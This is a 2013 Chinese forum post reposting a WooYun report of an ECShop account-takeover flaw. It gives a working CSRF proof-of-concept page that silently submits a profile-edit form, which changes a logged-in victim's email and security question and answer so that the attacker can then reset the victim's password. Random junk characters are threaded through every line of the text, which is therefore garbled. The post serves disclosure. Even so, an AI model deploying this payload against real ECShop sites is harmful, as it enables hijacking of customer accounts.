找回密码
 立即注册
查看: 2664|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
: v' {% y$ d) _ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现7 X, `8 W. ~6 L2 k% l0 W, e/ b5 }* P
+ |# y7 }4 M6 ^# Q
Demo For:http://www.wooyun.org/bug.php?action=view&id=395. g' [, D+ }2 I0 @  i

) B1 ^6 q; @5 n" N( t详细说明:
; z; {% z( u- }) }* ]. S利用csrf和xss可以突破官方所说的“障碍”1 s/ z8 e9 C. d
xss版本已经有人说明% H# }2 n' W- a) O* x  ?
这里给出csrf版本1 x! \# ~6 F: Y" ]7 `
' a) u( C  c# T5 P$ I- s
漏洞证明:
" P+ G' B. V3 c1 e  B<html>. k' {8 @" Q8 @' E# [: W
<body>
  x5 \8 V. q0 z: y8 T<form action="http://www.wooyun.org/ecshop/user.php" method="POST">+ U. F! [9 r0 ^% ~
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
! d  A; T; K& X$ {<INPUT TYPE="text" NAME="act" value="act_edit_profile">- I# w# \: h5 `& m* ~
<INPUT TYPE="text" NAME="sel_question" value="ecshop">% [- g$ ^& X. ]
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
" N: N; ~) C8 l0 U' |& _: |: B/ C</body>
* o- V2 w4 z; f  O; T2 t<script>
+ e; ]- ~" J' a+ Edocument.forms[0].submit();
2 N) n1 k; I& a; M2 k( Y! e1 P  n0 s</script># X9 B9 r6 ]- \5 [$ s  I0 O3 P
</html>
. o  y; K$ Y; M) K+ F' Z$ Y  a构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失8 r, y. D+ J* F* l. Q
/ e" Z& Z/ o8 b" r+ o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表